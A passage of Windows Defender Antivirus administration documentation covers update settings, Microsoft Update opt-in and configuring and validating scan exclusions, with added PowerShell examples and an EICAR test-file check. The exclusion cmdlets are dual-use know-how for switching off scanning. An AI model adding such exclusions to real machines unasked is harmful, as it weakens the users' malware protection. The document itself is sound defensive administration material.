updates at startup even when no antimalware engine is present yet (for example, on a freshly provisioned
machine).
Use Group Policy to download updates when Windows Defender Antivirus is not present:
1. On your Group Policy management machine, open the Group Policy Management Console, right-click the
Group Policy Object you want to configure and click Edit.
2. In the Group Policy Management Editor go to Computer configuration.
3. Click Policies then Administrative templates.
4. Expand the tree to Windows components > Windows Defender Antivirus > Signature Updates.
5. Double-click Initiate definition update on startup and set the option to Enabled.
6. Click OK.
Use PowerShell cmdlets to download updates when Windows Defender Antivirus is not present:
Use the following cmdlets:

Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine
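The two PowerShell settings in this topic, CheckForSignaturesBeforeRunningScan (above, under "Check for protection updates before running a scan") and SignatureDisableUpdateOnStartupWithoutEngine (here), are easy to get backwards because one is phrased positively and the other as a Disable flag. The following added example (not from the original page) is a small drift check: it compares both against a desired state, reports each, and only changes anything when -Apply is passed. The desired values are an assumption of the example.

```powershell
# Added example (not from the original page): report and optionally enforce the
# event-based update settings. Run in an elevated session.
function Test-EventBasedUpdateSettings {
    param([switch]$Apply)

    # Desired state, expressed exactly as the cmdlet names the settings:
    #   CheckForSignaturesBeforeRunningScan          $true  = update before a scheduled scan
    #   SignatureDisableUpdateOnStartupWithoutEngine $false = DO update at startup with no engine loaded
    $desired = [ordered]@{
        CheckForSignaturesBeforeRunningScan          = $true
        SignatureDisableUpdateOnStartupWithoutEngine = $false
    }

    $current = Get-MpPreference
    foreach ($name in $desired.Keys) {
        $actual = [bool]$current.$name
        $ok     = ($actual -eq $desired[$name])

        [pscustomobject]@{
            Setting   = $name
            Desired   = $desired[$name]
            Actual    = $actual
            Compliant = $ok
        }

        if (-not $ok -and $Apply) {
            # Splat a one-entry hashtable so the parameter name comes from $name
            $params = @{ $name = $desired[$name] }
            Set-MpPreference @params
        }
    }
}

Test-EventBasedUpdateSettings          # report only
Test-EventBasedUpdateSettings -Apply   # enforce the desired state
```

Because Get-MpPreference reflects the effective value regardless of whether it was set by Group Policy, Configuration Manager, WMI or the cmdlet, the report half of this function is a useful cross-check that the policy you deployed actually reached the endpoint.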

See Use PowerShell cmdlets to manage Windows Defender Antivirus and Defender cmdlets for more
information on how to use PowerShell with Windows Defender Antivirus.
Use Windows Management Instrumentation (WMI) to download updates when Windows Defender
Antivirus is not present:
Use the Set method of the MSFT_MpPreference class for the following properties:

SignatureDisableUpdateOnStartupWithoutEngine
See the following for more information:
Windows Defender WMIv2 APIs

Allow ad hoc changes to protection based on cloud-delivered protection
Windows Defender AV can make changes to its protection based on cloud-delivered protection. This can occur
outside of normal or scheduled protection updates.
If you have enabled cloud-delivered protection, Windows Defender AV will send files it is suspicious about to the
Windows Defender cloud. If the cloud service reports that the file is malicious, and the file is detected in a recent
protection update, you can use Group Policy to configure Windows Defender AV to automatically receive that
protection update. Other important protection updates can also be applied.
Use Group Policy to automatically download recent updates based on cloud-delivered protection:
1. On your Group Policy management machine, open the Group Policy Management Console, right-click the
Group Policy Object you want to configure and click Edit.
2. In the Group Policy Management Editor go to Computer configuration.
3. Click Policies then Administrative templates.
4. Expand the tree to Windows components > Windows Defender Antivirus > Signature Updates
and configure the following:
a. Double-click Allow real-time definition updates based on reports to Microsoft MAPS and set
the option to Enabled. Click OK.
b. Double-click Allow notifications to disable definitions based reports to Microsoft MAPS and
set the option to Enabled. Click OK.

NOTE
"Allow notifications to disable definitions based reports" enables Microsoft MAPS to disable those definitions known to
cause false-positive reports. You must configure your computer to join Microsoft MAPS for this function to work.

Related topics
Deploy Windows Defender Antivirus
Manage Windows Defender Antivirus updates and apply baselines
Manage when protection updates should be downloaded and applied
Manage updates for endpoints that are out of date
Manage updates for mobile devices and virtual machines (VMs)
Windows Defender Antivirus in Windows 10
Manage updates for mobile devices and virtual machines (VMs)
4/5/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
Mobile devices and VMs may require additional configuration to ensure performance is not impacted by updates.
There are two settings that are particularly useful for these devices:
Opt-in to Microsoft Update on mobile computers without a WSUS connection
Prevent Security intelligence updates when running on battery power
The following topics may also be useful in these situations:
Configuring scheduled and catch-up scans
Manage updates for endpoints that are out of date
Deployment guide for Windows Defender Antivirus in a virtual desktop infrastructure (VDI) environment

Opt-in to Microsoft Update on mobile computers without a WSUS connection
You can use Microsoft Update to keep Security intelligence on mobile devices running Windows Defender
Antivirus up to date when they are not connected to the corporate network or don't otherwise have a WSUS
connection.
This means that protection updates can be delivered to devices (via Microsoft Update) even if you have set
WSUS to override Microsoft Update.
You can opt-in to Microsoft Update on the mobile device in one of the following ways:
1. Change the setting with Group Policy
2. Use a VBScript to create a script, then run it on each computer in your network.
3. Manually opt-in every computer on your network through the Settings menu.
Use Group Policy to opt-in to Microsoft Update:
1. On your Group Policy management machine, open the Group Policy Management Console, right-click the
Group Policy Object you want to configure and click Edit.
2. In the Group Policy Management Editor go to Computer configuration.
3. Click Policies then Administrative templates.
4. Expand the tree to Windows components > Windows Defender Antivirus > Signature Updates.
5. Double-click the Allow definition updates from Microsoft Update setting and set the option to
Enabled. Click OK.
Use a VBScript to opt-in to Microsoft Update
1. Use the instructions in the MSDN article Opt-In to Microsoft Update to create the VBScript.
2. Run the VBScript you created on each computer in your network.
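The MSDN opt-in script drives the Windows Update Agent's Microsoft.Update.ServiceManager COM object. The following is an added example (not the MSDN script and not from the original page) doing the same opt-in from PowerShell, which is easier to push through a management tool than VBScript: it registers the Microsoft Update service with Automatic Updates only if it is not already registered, verifies the registration, and then makes sure MicrosoftUpdateServer appears in Windows Defender Antivirus's own fallback order so the opt-in is actually used when WSUS is unreachable. The service GUID is Microsoft's published identifier for Microsoft Update.

```powershell
# Added example (not from the original page): opt a mobile device in to
# Microsoft Update and confirm Defender can use it. Run in an elevated session.

# Published service ID of Microsoft Update
$MicrosoftUpdateServiceId = '7971f918-a847-4430-9279-4a52d1efe18d'

# AddService2 flags: 1 = allow pending registration, 2 = allow online registration,
# 4 = register the service with Automatic Updates. 7 = all three.
$AddServiceFlags = 7

$sm  = New-Object -ComObject 'Microsoft.Update.ServiceManager'
$svc = $sm.Services | Where-Object { $_.ServiceID -eq $MicrosoftUpdateServiceId }

if (-not $svc -or -not $svc.IsRegisteredWithAU) {
    $null = $sm.AddService2($MicrosoftUpdateServiceId, $AddServiceFlags, '')
    $svc  = $sm.Services | Where-Object { $_.ServiceID -eq $MicrosoftUpdateServiceId }
}
"Microsoft Update registered with Automatic Updates: $($svc.IsRegisteredWithAU)"

# Opting in to Microsoft Update does nothing for protection updates unless
# MicrosoftUpdateServer is in the fallback order Defender walks.
$order = (Get-MpPreference).SignatureFallbackOrder
if ([string]::IsNullOrEmpty($order)) {
    Set-MpPreference -SignatureFallbackOrder 'MicrosoftUpdateServer'
} elseif ($order -notmatch 'MicrosoftUpdateServer') {
    Set-MpPreference -SignatureFallbackOrder "$order|MicrosoftUpdateServer"
}
"Fallback order: $((Get-MpPreference).SignatureFallbackOrder)"
```

The Group Policy setting Allow definition updates from Microsoft Update described above is the policy-managed equivalent of the opt-in; this script is for devices that are not reachable by Group Policy, such as laptops that rarely join the corporate network.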
Manually opt-in to Microsoft Update
1. Open Windows Update in Update & security settings on the computer you want to opt-in.
2. Click Advanced options.
3. Select the checkbox for Give me updates for other Microsoft products when I update Windows.

Prevent Security intelligence updates when running on battery power
You can configure Windows Defender Antivirus to only download protection updates when the PC is connected
to a wired power source.
Use Group Policy to prevent definition updates on battery power:
1. On your Group Policy management machine, open the Group Policy Management Console, right-click the
Group Policy Object you want to configure and click Edit.
2. In the Group Policy Management Editor go to Computer configuration.
3. Click Policies then Administrative templates.
4. Expand the tree to Windows components > Windows Defender Antivirus > Signature Updates and
configure the following setting:
a. Double-click the Allow definition updates when running on battery power setting and set the
option to Disabled.
b. Click OK. This will prevent protection updates from downloading when the PC is on battery power.

Related topics
Manage Windows Defender Antivirus updates and apply baselines
Update and manage Windows Defender Antivirus in Windows 10
Customize, initiate, and review the results of Windows Defender Antivirus scans and remediation
4/5/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
You can use Group Policy, PowerShell, and Windows Management Instrumentation (WMI) to configure Windows
Defender Antivirus scans.

In this section
TOPIC: DESCRIPTION

Configure and validate file, folder, and process-opened file exclusions in Windows Defender Antivirus scans: You can exclude files (including files modified by specified processes) and folders from on-demand scans, scheduled scans, and always-on real-time protection monitoring and scanning.

Configure Windows Defender Antivirus scanning options: You can configure Windows Defender Antivirus to include certain types of email storage files, back-up or reparse points, and archived files (such as .zip files) in scans. You can also enable network file scanning.

Configure remediation for scans: Configure what Windows Defender Antivirus should do when it detects a threat, and how long quarantined files should be retained in the quarantine folder.

Configure scheduled scans: Set up recurring (scheduled) scans, including when they should run and whether they run as full or quick scans.

Configure and run scans: Run and configure on-demand scans using PowerShell, Windows Management Instrumentation, or individually on endpoints with the Windows Security app.

Review scan results: Review the results of scans using System Center Configuration Manager, Microsoft Intune, or the Windows Security app.
Configure and validate exclusions for Windows Defender Antivirus scans
4/5/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
You can exclude certain files, folders, processes, and process-opened files from Windows Defender Antivirus scans.
The exclusions apply to scheduled scans, on-demand scans, and always-on real-time protection and monitoring.
Exclusions for process-opened files only apply to real-time protection.
Exclusions can be useful to avoid incorrect detections on files or software that are unique or customized to your
organization.
Windows Server 2016 also features automatic exclusions that are defined by the server roles you enable. See the
Windows Defender Antivirus exclusions on Windows Server 2016 topic for more information and a list of the
automatic exclusions.

WARNING
Defining exclusions lowers the protection offered by Windows Defender Antivirus. You should always evaluate the risks that
are associated with implementing exclusions, and you should only exclude files that you are confident are not malicious.

In this section
TOPIC | DESCRIPTION
Configure and validate exclusions based on file name, extension, and folder location | Exclude files from Windows Defender Antivirus scans based on their file extension, file name, or location
Configure and validate exclusions for files opened by processes | Exclude files from scans that have been opened by a specific process
Configure Windows Defender Antivirus exclusions on Windows Server | Windows Server 2016 includes automatic exclusions, based on the defined server role. You can also add custom exclusions.

Configure and validate exclusions based on file extension and folder location
5/3/2019 • 10 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)

IMPORTANT
Windows Defender Advanced Threat Protection does not adhere to Windows Defender Antivirus exclusion settings. This means that any Windows
Defender exclusions, no matter how you created them, are not applied by Windows Defender ATP.

You can exclude certain files from Windows Defender Antivirus scans by modifying exclusion lists.
Generally, you shouldn't need to apply exclusions. Windows Defender Antivirus includes a number of automatic exclusions based on
known operating system behaviors and typical management files, such as those used in enterprise management, database
management, and other enterprise scenarios and situations.

NOTE
Automatic exclusions apply only to Windows Server 2016 and above.

TIP
The default antimalware policy we deploy at Microsoft doesn't set any exclusions by default.

This topic describes how to configure exclusion lists for the following:

EXCLUSION | EXAMPLES | EXCLUSION LIST
Any file with a specific extension | All files with the .test extension, anywhere on the machine | Extension exclusions
Any file under a specific folder | All files under the c:\test\sample folder | File and folder exclusions
A specific file in a specific folder | The file c:\sample\sample.test only | File and folder exclusions
A specific process | The executable file c:\test\process.exe | File and folder exclusions

This means the exclusion lists have the following characteristics:

- Folder exclusions will apply to all files and folders under that folder, unless the subfolder is a reparse point. Reparse point subfolders must be excluded separately.
- File extensions will apply to any file name with the defined extension if a path or folder is not defined.

IMPORTANT
The use of wildcards such as the asterisk (*) will alter how the exclusion rules are interpreted. See the Use wildcards in the file name and folder path
or extension exclusion lists section for important information about how wildcards work.
You cannot exclude mapped network drives. You must specify the actual network path.
Folders that are reparse points that are created after the Windows Defender Antivirus service starts and that have been added to the exclusion list
will not be included. You must restart the service (by restarting Windows) for new reparse points to be recognized as a valid exclusion target.

To exclude files opened by a specific process, see Configure and validate exclusions for files opened by processes.
The exclusions apply to scheduled scans, on-demand scans, and real-time protection.

IMPORTANT
Exclusion list changes made with Group Policy will show in the lists in the Windows Security app.
Changes made in the Windows Security app will not show in the Group Policy lists.

By default, local changes made to the lists (by users with administrator privileges, including changes made with PowerShell and WMI)
will be merged with the lists as defined (and deployed) by Group Policy, Configuration Manager, or Intune. The Group Policy lists will
take precedence in case of conflicts.
You can configure how locally and globally defined exclusions lists are merged to allow local changes to override managed deployment
settings.

Configure the list of exclusions based on folder name or file extension

Use Intune to configure file name, folder, or file extension exclusions:
See Configure device restriction settings in Microsoft Intune and Windows Defender Antivirus device restriction settings for Windows
10 in Intune for more details.
Use Configuration Manager to configure file name, folder, or file extension exclusions:
See How to create and deploy antimalware policies: Exclusion settings for details on configuring System Center Configuration
Manager (current branch).
Use Group Policy to configure folder or file extension exclusions:

NOTE
If you specify a fully qualified path to a file, then only that file is excluded. If a folder is defined in the exclusion, then all files and subdirectories under
that folder are excluded.

1. On your Group Policy management computer, open the Group Policy Management Console, right-click the Group Policy Object
you want to configure and click Edit.
2. In the Group Policy Management Editor go to Computer configuration and click Administrative templates.
3. Expand the tree to Windows components > Windows Defender Antivirus > Exclusions.
4. Double-click the Path Exclusions setting and add the exclusions:
a. Set the option to Enabled.
b. Under the Options section, click Show....
c. Enter each folder on its own line under the Value name column. If you are entering a file, ensure you enter a fully qualified
path to the file, including the drive letter, folder path, filename, and extension. Enter 0 in the Value column.
5. Click OK.
6. Double-click the Extension Exclusions setting and add the exclusions:
a. Set the option to Enabled.
b. Under the Options section, click Show....
c. Enter each file extension on its own line under the Value name column. Enter 0 in the Value column.
7. Click OK.
Use PowerShell cmdlets to configure file name, folder, or file extension exclusions:
Using PowerShell to add or remove exclusions for files based on the extension, location, or file name requires using a combination of
three cmdlets and the appropriate exclusion list parameter. The cmdlets are all in the Defender module.
The format for the cmdlets is:

<cmdlet> -<exclusion list> "<item>"

The following are allowed as the <cmdlet>:

CONFIGURATION ACTION | POWERSHELL CMDLET
Create or overwrite the list | Set-MpPreference
Add to the list | Add-MpPreference
Remove item from the list | Remove-MpPreference

The following are allowed as the <exclusion list>:

EXCLUSION TYPE | POWERSHELL PARAMETER
All files with a specified file extension | -ExclusionExtension
All files under a folder (including files in subdirectories), or a specific file | -ExclusionPath

IMPORTANT
If you have created a list, either with Set-MpPreference or Add-MpPreference, using the Set-MpPreference cmdlet again will overwrite the
existing list.

For example, the following code snippet would cause Windows Defender AV scans to exclude any file with the .test file extension:
Add-MpPreference -ExclusionExtension ".test"

See Use PowerShell cmdlets to configure and run Windows Defender Antivirus and Defender cmdlets for more information on how to
use PowerShell with Windows Defender Antivirus.
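
The following script is an added example (not part of the Microsoft documentation) that walks through the three cmdlets above and, in particular, shows how to avoid the Set-MpPreference overwrite pitfall by reading the current list first and merging it with the change you want. It assumes an elevated PowerShell session with the Defender module; the paths and extension it uses (C:\Test\Sample, C:\Test\Other, .test and so on) are constructed sample values taken from the examples table, not recommended exclusions.

```powershell
# Added example: manage path and extension exclusions without losing existing entries.
# Requires an elevated session with the Defender module (Windows 10 / Server 2016).
# Sample values below are constructed for the demonstration.
$newPaths      = @('C:\Test\Sample', 'C:\Sample\sample.test', 'C:\Test\process.exe')
$newExtensions = @('.test')

function Get-CurrentExclusions {
    # Returns the three exclusion lists as plain arrays (empty when nothing is set).
    $prefs = Get-MpPreference
    [pscustomobject]@{
        Path      = @($prefs.ExclusionPath      | Where-Object { $_ })
        Extension = @($prefs.ExclusionExtension | Where-Object { $_ })
        Process   = @($prefs.ExclusionProcess   | Where-Object { $_ })
    }
}

# 1. Add-MpPreference appends to whatever is already configured.
Add-MpPreference -ExclusionPath $newPaths
Add-MpPreference -ExclusionExtension $newExtensions

# 2. Set-MpPreference replaces the whole list. To rewrite the path list while
#    keeping the rest (here: drop one stale entry and add another), merge the
#    current list with the change before calling Set-MpPreference.
$current = Get-CurrentExclusions
$merged  = @($current.Path + 'C:\Test\Other') |
    Where-Object { $_ -ne 'C:\Test\process.exe' } |
    Select-Object -Unique
Set-MpPreference -ExclusionPath $merged

# 3. Remove-MpPreference removes individual items from a list.
Remove-MpPreference -ExclusionExtension '.test'

# 4. Print each list one item per line (Get-MpPreference alone collapses each
#    list onto a single output line, which is hard to read for long lists).
$after = Get-CurrentExclusions
'Path exclusions:';      $after.Path      | ForEach-Object { "  $_" }
'Extension exclusions:'; $after.Extension | ForEach-Object { "  $_" }
'Process exclusions:';   $after.Process   | ForEach-Object { "  $_" }
```

Because local changes are merged with Group Policy, Configuration Manager or Intune lists (Group Policy winning on conflict), the lists printed in step 4 may contain entries this script never added.
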
Use Windows Management Instrumentation (WMI) to configure file name, folder, or file extension exclusions:
Use the Set, Add, and Remove methods of the MSFT_MpPreference class for the following properties:

ExclusionExtension
ExclusionPath

The use of Set, Add, and Remove is analogous to their counterparts in PowerShell: Set-MpPreference, Add-MpPreference, and
Remove-MpPreference.

See the following for more information and allowed parameters:

Windows Defender WMIv2 APIs
Use the Windows Security app to configure file name, folder, or file extension exclusions:
See Add exclusions in the Windows Security app for instructions.

Use wildcards in the file name and folder path or extension exclusion lists
You can use the asterisk *, question mark ?, or environment variables (such as %ALLUSERSPROFILE%) as wildcards when defining items
in the file name or folder path exclusion list. The way in which these wildcards are interpreted differs from their usual usage in other
apps and languages, so you should read this section to understand their specific limitations.

IMPORTANT
There are key limitations and usage scenarios for these wildcards:
Environment variable usage is limited to machine variables and those applicable to processes running as an NT AUTHORITY\SYSTEM account.
You cannot use a wildcard in place of a drive letter.
An asterisk * in a folder exclusion will stand in place for a single folder. Use multiple instances of \*\ to indicate multiple nested folders with
unspecified names.

The following table describes how the wildcards can be used and provides some examples.

WILDCARD: * (asterisk)
Use in file and file extension exclusions: Replaces any number of characters. Only applies to files in the last folder defined in the argument.
Use in folder exclusions: Replaces a single folder. Use multiple * with folder slashes \ to indicate multiple, nested folders. After matching to the number of wildcarded and named folders, all subfolders will also be included.
Example use:
1. C:\MyData\*.txt
2. C:\somepath\*\Data
3. C:\Serv\*\*\Backup
Example matches:
1. C:\MyData\notes.txt
2. Any file in C:\somepath\Archives\Data and its subfolders, and any file in C:\somepath\Authorized\Data and its subfolders
3. Any file in C:\Serv\Primary\Denied\Backup and its subfolders, and any file in C:\Serv\Secondary\Allowed\Backup and its subfolders

WILDCARD: ? (question mark)
Use in file and file extension exclusions: Replaces a single character. Only applies to files in the last folder defined in the argument.
Use in folder exclusions: Replaces a single character in a folder name. After matching to the number of wildcarded and named folders, all subfolders will also be included.
Example use:
1. C:\MyData\my?.zip
2. C:\somepath\?\Data
3. C:\somepath\test0?\Data
Example matches:
1. C:\MyData\my1.zip
2. Any file in C:\somepath\P\Data and its subfolders
3. Any file in C:\somepath\test01\Data and its subfolders

WILDCARD: Environment variables
Use in file and file extension exclusions: The defined variable will be populated as a path when the exclusion is evaluated.
Use in folder exclusions: Same as file and extension use.
Example use:
1. %ALLUSERSPROFILE%\CustomLogFiles
Example matches:
1. C:\ProgramData\CustomLogFiles\Folder1

IMPORTANT
If you mix a file exclusion argument with a folder exclusion argument, the rules will stop at the file argument match in the matched folder, and will
not look for file matches in any subfolders.
For example, you can exclude all files that start with "date" in the folders c:\data\final\marked and c:\data\review\marked by using the rule
argument c:\data\*\marked\date*.*.
This argument, however, will not match any files in subfolders under c:\data\final\marked or c:\data\review\marked.

Review the list of exclusions

You can retrieve the items in the exclusion list with Intune, System Center Configuration Manager, MpCmdRun, PowerShell, or the
Windows Security app.

IMPORTANT
Exclusion list changes made with Group Policy will show in the lists in the Windows Security app.
Changes made in the Windows Security app will not show in the Group Policy lists.

If you use PowerShell, you can retrieve the list in two ways:
- Retrieve the status of all Windows Defender Antivirus preferences. Each of the lists will be displayed on separate lines, but the items within each list will be combined into the same line.
- Write the status of all preferences to a variable, and use that variable to only call the specific list you are interested in. Each use of Add-MpPreference is written to a new line.

Validate the exclusion list by using MpCmdRun:

To check exclusions with the dedicated command-line tool mpcmdrun.exe, use the following command:

MpCmdRun.exe -CheckExclusion -path <path>

NOTE
Checking exclusions with MpCmdRun requires Windows Defender Antivirus CAMP version 4.18.1812.3 (released in December 2018) or later.
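
The wildcard rules from the table above (an asterisk stands for exactly one folder level, and matched folders include their subfolders) are easiest to understand by asking the engine directly. This added example (not part of the Microsoft documentation) runs MpCmdRun.exe -CheckExclusion over a few constructed candidate paths. It assumes the folder exclusion C:\somepath\*\Data from the wildcard table has been configured, and that MpCmdRun.exe is at the path in $mpCmdRun; on machines that received the Defender platform update the binary lives under %ProgramData%\Microsoft\Windows Defender\Platform\<version>\ instead, so adjust that variable if needed.

```powershell
# Added example: check several paths against the configured exclusions with
# MpCmdRun.exe -CheckExclusion (requires CAMP 4.18.1812.3 or later).
# Assumption: the location of MpCmdRun.exe; adjust for platform-updated installs.
$mpCmdRun = Join-Path $env:ProgramFiles 'Windows Defender\MpCmdRun.exe'

# Constructed candidate paths for the exclusion C:\somepath\*\Data:
#  - one folder between somepath and Data          -> covered by the wildcard
#  - a subfolder of a matched Data folder          -> covered (subfolders included)
#  - two folders between somepath and Data         -> not covered (* is one level)
$candidates = @(
    'C:\somepath\Archives\Data\report.txt',
    'C:\somepath\Authorized\Data\sub\report.txt',
    'C:\somepath\Archives\2019\Data\report.txt'
)

function Test-DefenderExclusion {
    param([Parameter(Mandatory)][string]$Path)
    # The tool prints whether the path is covered; we return its text unparsed
    # so the result reads the same as running the command by hand.
    $output = & $mpCmdRun -CheckExclusion -path $Path 2>&1
    [pscustomobject]@{
        Path   = $Path
        Result = (($output | ForEach-Object { "$_" }) -join ' ').Trim()
    }
}

$candidates |
    ForEach-Object { Test-DefenderExclusion -Path $_ } |
    Format-Table -AutoSize -Wrap
```

Run the same loop before and after a change to an exclusion list and compare the two results; that is a quick regression check when you tighten a wildcard rule.
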

Review the list of exclusions alongside all other Windows Defender Antivirus preferences by using PowerShell:
Use the following cmdlet:

Get-MpPreference

In the following example, the items contained in the ExclusionExtension list are highlighted:
See Use PowerShell cmdlets to configure and run Windows Defender Antivirus and Defender cmdlets for more information on how to
use PowerShell with Windows Defender Antivirus.
Retrieve a specific exclusions list by using PowerShell:
Use the following code snippet (enter each line as a separate command); replace WDAVprefs with whatever label you want to name
the variable:

$WDAVprefs = Get-MpPreference
$WDAVprefs.ExclusionExtension
$WDAVprefs.ExclusionPath

In the following example, the list is split into new lines for each use of the Add-MpPreference cmdlet:

See Use PowerShell cmdlets to configure and run Windows Defender Antivirus and Defender cmdlets for more information on how to
use PowerShell with Windows Defender Antivirus.

Validate exclusions lists with the EICAR test file

You can validate that your exclusion lists are working by using PowerShell with either the Invoke-WebRequest cmdlet or the .NET
WebClient class to download a test file.
In the following PowerShell snippet, replace test.txt with a file that conforms to your exclusion rules. For example, if you have excluded
the .testing extension, replace test.txt with test.testing. If you are testing a path, ensure you run the cmdlet within that path.

Invoke-WebRequest "http://www.eicar.org/download/eicar.com.txt" -OutFile "test.txt"

If Windows Defender Antivirus reports malware, then the rule is not working. If there is no report of malware, and the downloaded file
exists, then the exclusion is working. You can open the file to confirm the contents are the same as what is described on the EICAR
testfile website.
You can also use the following PowerShell code, which calls the .NET WebClient class to download the test file. As with the
Invoke-WebRequest cmdlet, replace c:\test.txt with a file that conforms to the rule you are validating:

$client = new-object System.Net.WebClient
$client.DownloadFile("http://www.eicar.org/download/eicar.com.txt","c:\test.txt")

If you do not have Internet access, you can create your own EICAR test file by writing the EICAR string to a new text file with the
following PowerShell command:

[io.file]::WriteAllText("test.txt",'X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*')

You can also copy the string into a blank text file and attempt to save it with the file name or in the folder you are attempting to exclude.
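
The offline EICAR check above can be turned into a repeatable test. The following function is an added example (not part of the Microsoft documentation): it writes the EICAR string into the folder you are validating, waits for real-time protection to act, and then reports whether the file survived and whether Windows Defender Antivirus recorded a detection for it. It assumes the folder is already covered by the exclusion under test; the function name, the default file name eicar-check.testing and the wait time are this example's own choices. It passes a full path to WriteAllText because the .NET call resolves relative paths against the process working directory, which is not always PowerShell's current location.

```powershell
# Added example: validate an exclusion with the EICAR test string, offline.
# Assumption: $Folder is covered by an exclusion you configured beforehand.
$eicar = 'X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*'

function Test-ExclusionWithEicar {
    param(
        [Parameter(Mandatory)][string]$Folder,
        [string]$FileName = 'eicar-check.testing',   # constructed default; choose a name that fits your rule
        [int]$WaitSeconds = 10
    )
    $path  = Join-Path $Folder $FileName
    $start = Get-Date

    # Always pass a full path: [io.file]::WriteAllText uses the process working
    # directory for relative paths, not PowerShell's current location.
    [System.IO.File]::WriteAllText($path, $eicar)

    # Give always-on real-time protection time to react to the new file.
    Start-Sleep -Seconds $WaitSeconds

    $stillThere = Test-Path -LiteralPath $path
    # A detection for this file recorded after $start means the exclusion did not apply.
    $detected = Get-MpThreatDetection |
        Where-Object { $_.InitialDetectionTime -ge $start -and ($_.Resources -like "*$FileName*") }

    $excluded = $stillThere -and -not $detected
    if ($stillThere) { Remove-Item -LiteralPath $path -Force -ErrorAction SilentlyContinue }

    [pscustomobject]@{
        Path     = $path
        FileKept = $stillThere
        Detected = [bool]$detected
        Excluded = $excluded
    }
}

# Constructed usage: validate a folder exclusion for C:\Test\Sample.
Test-ExclusionWithEicar -Folder 'C:\Test\Sample'
```

Excluded = True is the outcome the page describes for a working rule (no malware report and the file still exists); Excluded = False with Detected = True means the rule did not match and the file was handled as a threat.
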

Related topics
Configure and validate exclusions in Windows Defender Antivirus scans
Configure and validate exclusions for files opened by processes
Configure Windows Defender Antivirus exclusions on Windows Server
Customize, initiate, and review the results of Windows Defender Antivirus scans and remediation
Windows Defender Antivirus in Windows 10

Configure exclusions for files opened by processes
4/5/2019 • 6 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
You can exclude files that have been opened by specific processes from Windows Defender Antivirus scans.
This topic describes how to configure exclusion lists for the following:

EXCLUSION | EXAMPLE
Any file on the machine that is opened by any process with a specific file name | Specifying "test.exe" would exclude files opened by: c:\sample\test.exe, d:\internal\files\test.exe
Any file on the machine that is opened by any process under a specific folder | Specifying "c:\test\sample\*" would exclude files opened by: c:\test\sample\test.exe, c:\test\sample\test2.exe, c:\test\sample\utility.exe
Any file on the machine that is opened by a specific process in a specific folder | Specifying "c:\test\process.exe" would exclude files only opened by c:\test\process.exe

When you add a process to the process exclusion list, Windows Defender Antivirus won't scan files opened by that
process, no matter where the files are located. The process itself, however, will be scanned unless it has also been
added to the file exclusion list.
The exclusions only apply to always-on real-time protection and monitoring. They don't apply to scheduled or on-demand scans.
Changes made with Group Policy to the exclusion lists will show in the lists in the Windows Security app.
However, changes made in the Windows Security app will not show in the Group Policy lists.
You can add, remove, and review the lists for exclusions in Group Policy, System Center Configuration Manager,
Microsoft Intune, and with the Windows Security app, and you can use wildcards to further customize the lists.
You can also use PowerShell cmdlets and WMI to configure the exclusion lists, including reviewing your lists.
By default, local changes made to the lists (by users with administrator privileges; this includes changes made with
PowerShell and WMI) will be merged with the lists as defined (and deployed) by Group Policy, Configuration
Manager, or Intune. The Group Policy lists will take precedence in the case of conflicts.
You can configure how locally and globally defined exclusions lists are merged to allow local changes to override
managed deployment settings.

Configure the list of exclusions for files opened by specified processes

Use Microsoft Intune to exclude files that have been opened by specified processes from scans:
See Configure device restriction settings in Microsoft Intune and Windows Defender Antivirus device restriction
settings for Windows 10 in Intune for more details.
Use System Center Configuration Manager to exclude files that have been opened by specified
processes from scans:
See How to create and deploy antimalware policies: Exclusion settings for details on configuring System Center
Configuration Manager (current branch).
Use Group Policy to exclude files that have been opened by specified processes from scans:
1. On your Group Policy management computer, open the Group Policy Management Console, right-click the
Group Policy Object you want to configure and click Edit.
2. In the Group Policy Management Editor go to Computer configuration and click Administrative
templates.
3. Expand the tree to Windows components > Windows Defender Antivirus > Exclusions.
4. Double-click Process Exclusions and add the exclusions:
a. Set the option to Enabled.
b. Under the Options section, click Show....
c. Enter each process on its own line under the Value name column. See the example table for the different
types of process exclusions. Enter 0 in the Value column for all processes.
5. Click OK.

Use PowerShell cmdlets to exclude files that have been opened by specified processes from scans:
Using PowerShell to add or remove exclusions for files that have been opened by processes requires using a
combination of three cmdlets with the -ExclusionProcess parameter. The cmdlets are all in the Defender module.
The format for the cmdlets is:

<cmdlet> -ExclusionProcess "<item>"

The following are allowed as the <cmdlet>:

CONFIGURATION ACTION | POWERSHELL CMDLET
Create or overwrite the list | Set-MpPreference
Add to the list | Add-MpPreference
Remove items from the list | Remove-MpPreference

IMPORTANT
If you have created a list, either with Set-MpPreference or Add-MpPreference, using the Set-MpPreference cmdlet again
will overwrite the existing list.

For example, the following code snippet would cause Windows Defender AV scans to exclude any file that is
opened by the specified process:

Add-MpPreference -ExclusionProcess "c:\internal\test.exe"

See Manage antivirus with PowerShell cmdlets and Defender cmdlets for more information on how to use PowerShell with Windows Defender
Antivirus.
Use Windows Management Instrumentation (WMI) to exclude files that have been opened by specified
processes from scans:
Use the Set, Add, and Remove methods of the MSFT_MpPreference class for the following properties:

ExclusionProcess

The use of Set, Add, and Remove is analogous to their counterparts in PowerShell: Set-MpPreference,
Add-MpPreference, and Remove-MpPreference.

See the following for more information and allowed parameters:

Windows Defender WMIv2 APIs
Use the Windows Security app to exclude files that have been opened by specified processes from scans:
See Add exclusions in the Windows Security app for instructions.

Use wildcards in the process exclusion list

The use of wildcards in the process exclusion list is different from their use in other exclusion lists.
In particular, you cannot use the question mark ? wildcard, and the asterisk * wildcard can only be used at the end
of a complete path. You can still use environment variables (such as %ALLUSERSPROFILE%) as wildcards when
defining items in the process exclusion list.
The following table describes how the wildcards can be used in the process exclusion list:

WILDCARD: * (asterisk)
Use: Replaces any number of characters
Example use: C:\MyData\*
Example matches: Any file opened by C:\MyData\file.exe

WILDCARD: ? (question mark)
Use: Not available
Example use: -
Example matches: -

WILDCARD: Environment variables
